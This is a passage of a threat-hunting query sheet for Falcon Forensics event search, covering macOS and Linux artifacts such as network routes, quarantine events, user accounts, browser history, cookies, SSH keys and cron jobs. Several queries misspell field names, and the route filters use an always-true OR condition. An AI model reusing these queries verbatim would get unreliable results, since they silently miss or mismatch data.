#event_simpleName=Network* ForensicsCollectionIdentifier= <collectionid> ContextProcessId= <Context Process ID> ImageFileName= <ImageFileName of interest> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table ([aid, ForensicsCollectionIdentifier, RemoteAddressIP4, RemoteAddressIP6, RemotePort, LocalAddressIP4, LocalAddressIP6, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, ContextProcessId, ContextThreadId, InContext], limit=max)

Quarantine

LSQuarantineEvent

#event_simpleName=LSQuarantineEvent ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, TargetFileName, UserName, QuarantineEventIdentifier, QuarantineAgentBundleIdentifier, QuarantineAgentName, QuarantineDataURL, QuarantineSenderName, QuarantineSenderAddress, QuarantineTypeNumber, QuarantineOriginTitle, QuarantineOriginURL, QuarantineOriginAlias], limit=max)

QuarantineXattribute

#event_simpleName=QuarantineXattribute ForensicsCollectionIdentifier=*
| ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds)
| time := formatTime("%F %T", field=ContextTimeStamp)
| table([time, aid, ForensicsCollectionIdentifier, TargetFileName, UserName, QuaratineFlagsString, QuarantineAgentName, QuarantineEventIdentifier], limit=max)

RouteIP4

Show all Fields

#event_simpleName=RouteIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP4, DefaultGatewayPhysicalAddress, RemoteAddressIP4, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP4, NetLuidIndex], limit=max)

IPv4 remote connections

#event_simpleName=RouteIP4 ForensicsCollectionIdentifier=* RemoteAddressIP4!="0.0.0.0" OR RemoteAddressIP4!="" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP4, DefaultGatewayPhysicalAddress, RemoteAddressIP4, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP4, NetLuidIndex], limit=max)

RouteIP6

Show all Fields

#event_simpleName=RouteIP6 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP6, DefaultGatewayPhysicalAddress, RemoteAddressIP6, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP6, NetLuidIndex], limit=max)

IPv6 remote connections

#event_simpleName=RouteIP6 ForensicsCollectionIdentifier=* RemoteAddressIP6!="0.0.0.0" OR RemoteAddressIP6!="" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, aid, Protocol, DefaultGatewayIP6, DefaultGatewayPhysicalAddress, RemoteAddressIP6, InterfaceAlias, InterfaceIndex, IpEntryFlags, RouteType, RouteAge, RouteMetric, RemoteAddressMaskIP6, NetLuidIndex], limit=max)

SignInfo

Show All Fields

#event_simpleName=SignInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicCollectionIdentifier, ImageFileName, TargetFileName, SHA256HashData, SignInfoFlags, SignerInfoCount, SignerInfo1, SignerInfo2, SignerInfo3, SignerInfo4, CertificateType, CertificateComment, CertificateSigner, CertificateVerified, CertificateCheckResult], limit=max)

Show Fields Matching ImageFileName

#event_simpleName=SignInfo ForensicsCollectionIdentifier=* ImageFileName=PATH | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicCollectionIdentifier, ImageFileName, TargetFileName, SHA256HashData, SignInfoFlags, SignerInfoCount, SignerInfo1, SignerInfo2, SignerInfo3, SignerInfo4, CertificateType, CertificateComment, CertificateSigner, CertificateVerified, CertificateCheckResult], limit=max)

Note: PATH can be replaced with a glob path, such as /usr/libexec/*.

SpotlightSearchEntry

Show all fields

#event_simpleName=SpotlightSearchEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | UrlLastAccessedTimeStamp := parseTimeStamp(field=UrlLastAccessedTimeStamp, format=seconds) | UrlLastAccessedTimeStamp := formatTime("%F %T", field=UrlLastAccessedTimeStamp) | table([time, aid, cid, ForensicCollectionIdentifier, SourceFileName, UserName, SpotlightSearchKey, SpotlightResourceName, UrlLastAccessedTimeStamp, Url], limit=max)

SystemExtension

Show all Fields

#event_simpleName=SystemExtension ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, SystemExtensionName, MacBundleVersion, ExtensionIsLoaded,TargetFileName], limit=max)

Show if a specific system extension is loaded

#event_simpleName=SystemExtension ForensicsCollectionIdentifier=* SystemExtensionName= <extension of interest> | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, SystemExtensionName, MacBundleVersion, ExtensionIsLoaded,TargetFileName], limit=max)

Show only loaded system extensions

#event_simpleName=SystemExtension ForensicsCollectionIdentifier=* ExtensionIsLoaded=true | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BundleID, SystemExtensionName, MacBundleVersion, ExtensionIsLoaded,TargetFileName], limit=max)

TerminalSavedStateInfo

Show all fields

#event_simpleName=TerminalSavedStateInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicCollectionIdentifier, UserName, TerminalWindowTitle, TerminalTabWorkingDirectoryUrl, TerminalDataBlockIndex, SourceFileName, TerminalWindowId, Line, ForensicsText], limit=max)

UserAccount

Show all Fields

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([time, aid, ForensicsCollectionIdentifier,UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

Show all fields for UserAccountDeleted

#event_simpleName=UserAccountDeleted ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, UID, UserRealName], limit=max)

Show users with root GID

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* GID=0 | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([PasswordLastSet, aid, ForensicsCollectionIdentifier, UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

Show users with admin level privileges

#event_simpleName=UserAccount ForensicsCollectionIdentifier=* UserIsAdmin=1 | PasswordLastSet := parseTimeStamp(field=PasswordLastSet, format=seconds) | PasswordLastSet := formatTime("%F %T", field=PasswordLastSet) | table([PasswordLastSet, aid, ForensicsCollectionIdentifier, UID, UserName, UserRealName, UserIsAdmin, HomeDirectory, PasswordLastSet, GID, UserMemberGIDs], limit=max)

YARA

Show all fields for FfcBytePatternScanResult

#event_simpleName=FfcBytePatternScanResult ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcScanId, FfcScanType, FfcScanResult, FfcScanRuleName, ImageFileName, TargetFileName, MD5HashData, SHA1HashData, SHA256HashData], limit=max)

Falcon Forensics Query Sheet for Linux

Example queries to be used in advanced event search to investigate ingested Forensics data in Linux.

Tips for searches

These are examples of case sensitivity in searches.

HostName=Test only matches hosts named "Test"
HostName=/test/i matches test, Test, TeSt, or any similar combination

System

ForensicsCollectorOnline

Show all Fields

#event_simpleName = ForensicsCollectorOnline ForensicsCollectionIdentifier = * FfcPlatform= FFC_PLATFORM_LINUX | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcExecutableName, FfcExecutablePath, PhysicalAddress, LocalAddressIP4, LocalAddressIP6], limit=max)

ForensicsCollectorOffline

Show all fields

#event_simpleName = ForensicsCollectorOffline ForensicsCollectionIdentifier = * FfcPlatform= FFC_PLATFORM_LINUX | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ComputerName, FfcPlatform, aid, cid, FfcCollectionId, FfcExecutableName, FfcExecutablePath], limit=max)

ForensicsCollectorLog

Show all Fields

#event_simpleName = ForensicsCollectorLog ForensicsCollectionIdentifier = * | "Log Text" := rename(FfcCollectorLogText) | Module := rename(FfcModule) | "Log Level" := rename(FfcLogLevel) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, id, "Log Level", Module, "Log Text"])

BrowserAccount

Show all Fields

#event_simpleName = BrowserAccountInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BrowserAccountId, BrowserArtifactType, BrowserAccountEmail, BrowserAccountFullName, BrowserAccountGivenName, BrowserAccountEmailDomain, BrowserAccountIsSupervisedChild, BrowserAccountIsUnderAdvancedProtection, BrowserLocale, SourceFileName, UserName], limit=max)

Show browser accounts with common private email domain

#event_simpleName = BrowserAccountInfo ForensicsCollectionIdentifier = * | BrowserAccountEmail=*gmail.com OR BrowserAccountEmail=*hotmail.com OR BrowserAccountEmail=*yahoo.com OR BrowserAccountEmail=*outlook.com OR BrowserAccountEmail=*icloud.com | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BrowserAccountId, BrowserArtifactType, BrowserAccountEmail, BrowserAccountFullName, BrowserAccountGivenName, BrowserAccountEmailDomain, BrowserAccountIsSupervisedChild, BrowserAccountIsUnderAdvancedProtection, BrowserLocale, SourceFileName, UserName], limit=max)

BrowserCookie

Show all Fields

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | BrowserName = BROWSERNAME | table([aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieLastAccessed, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name, such as Firefox, Chrome. The BrowserName line can also be used in other queries to filter by browser.

Show cookies from a specific site

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | BrowserCookieHost = <site of interest> | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Note: Replace with site name. You can use wildcards such as "*google.com".

BrowserDownloadStart

Show all Fields

#event_simpleName=BrowserDownloadStarted | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Size, TargetFileName, SourceFileName, BrowserDownloadLastAccessed, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, MimeType, BrowserDownloadFileState, BrowserDownloadFileOpened, BrowserDownloadSiteUrl, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name, such as Firefox, Chrome.

Show downloaded files from a specific site

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserDownloadSiteUrl = * | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show abnormally large files

#event_simpleName = BrowserDownloadStarted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Size > <fill in bytes here> | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, , Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Change with the number of bytes you're looking for.

BrowserDownloadEnd

Show all Fields

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name, such as Firefox, Chrome.

Show downloaded files from a specific site

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserDownloadSiteUrl = * | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show abnormally large files

#event_simpleName = BrowserDownloadEnded ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | Size > <fill in bytes here> | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

BrowserExtensionInfo

Show all Fields

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) |table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)

Show Fields Matching Browser

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME |table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name, such as Firefox, Chrome.

Show if extension of interest is installed

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserExtensionName = <Extension Name> |table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, SourceFileName, UserName], limit=max)

BrowserHistoryVisit

Show all Fields

#event_simpleName=BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Title, BrowserVisitCount, BrowserUrlTypedCount, BrowserVisitType, Id, BrowserRedirectSourceTableEntry, BrowserRedirectDesitnationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastModifiedTimeStamp], limit=max)

Show Fields Matching Browser

#event_simpleName=BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastMOdifiedTimeStamp, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name, such as Firefox, Chrome.

Show sites that were manually navigated to (TYPED)

#event_simpleName = BrowserHistoryVisit ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserVisitType = TYPED | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastMOdifiedTimeStamp, SourceFileName, UserName], limit=max)

Show visits to a specific URL

#event_simpleName = BrowserHistoryVisit ForensicsCollectionIdentifier = * | lastVisit := rename(ContextTimeStamp) | lastVisit := formatTime("%Y-%m-%d %H:%M:%S") | Url = URL | table([lastVisit, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, Id, Title, Url, BrowserUrlTypedCount, BrowserVisitCount, BrowserVisitType, BrowserRedirectSourceTableEntry, BrowserRedirectDestinationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastAccessedTimestamp, UrlLastMOdifiedTimeStamp, SourceFileName, UserName], limit=max)

BrowserHistoryClearInfo

Show all Fields

#event_simpleName = BrowserHistoryClearInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) |table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserClearedDataPeriodBasic, BrowserClearedDataPeriodAdvanced, BrowserClearedDataCookiesBasic, BrowserClearedDataCookiesAdvanced, BrowserClearedFormData, BrowserClearedHostedAppsData, BrowserClearedPasswords, BrowserCLearedSiteSettings, SourceFileName, UserName], limit=max)

Show if users' browser data was reset for "All Time"

#event_simpleName = BrowserHistoryClearInfo ForensicsCollectionIdentifier = * | BrowserClearedDataPeriodBasic=-1 | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserClearedDataPeriodBasic, BrowserClearedDataPeriodAdvanced, BrowserClearedDataCookiesBasic, BrowserClearedDataCookiesAdvanced, BrowserClearedFormData, BrowserClearedHostedAppsData, BrowserClearedPasswords, BrowserCLearedSiteSettings, SourceFileName, UserName])

BrowserProxy

Show all Fields

#event_simpleName = BrowserProxyInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserProxyType, BrowserProxyUrlHttp, BrowserProxyPortHttp, BrowserProxyUrlSsl, BrowserProxyPortSsl, BrowserProxyPacUrl, BrowserProxyAllowlist, BrowserProxyShare, SourceFileName, UserName], limit=max)

Show manually set proxy settings

#event_simpleName = BrowserProxyInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserProxyType = MANUAL_PROXY | table([time, aid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserProxyType, BrowserProxyUrlHttp, BrowserProxyPortHttp, BrowserProxyUrlSsl, BrowserProxyPortSsl, BrowserProxyPacUrl, BrowserProxyAllowlist, BrowserProxyShare, SourceFileName, UserName], limit=max)

CreateSocket

Show all Fields

#event_simpleName=CreateSocket ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, AddressFamily, RawProcessId, SocketType, Protocol], limit=max)

Entropy

Show all fields for EntropyScan

#event_simpleName=EntropyScan ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FileIdentifier, BytesScanned, ShannonEntropy, AverageWordLength, AverageLineLength, MaxLineLength, WhitespaceRatio, SpecialCharactersRatio], limit=max)

EnvVars

Show all Fields

#event_simpleName=RuntimeEnvironmentVariable ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, EnvironmentVariableName, EnvironmentVariableValue], limit=max)

FileEntry

Show all Fields

#event_simpleName=FileEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Reassemble files by line

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max) | sort([TargetFileName, Line], order=asc, limit=max)

Shell history

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SHELL_HISTORY | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

SSH configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SSH_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Known hosts

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_KNOWN_HOSTS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Shell configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SHELL_CONFIG | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Authorized keys

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_AUTHORIZED_KEYS | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

Cron jobs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SCHEDULED | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System start configs

#event_simpleName=FileEntry ForensicsCollectionIdentifier= * FileEntrySourceType=FILE_SYSTEM_START | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FileEntrySourceType, TargetFileName, Line, Length, ForensicsText, FfcLogFilterTag], limit=max)

System configs

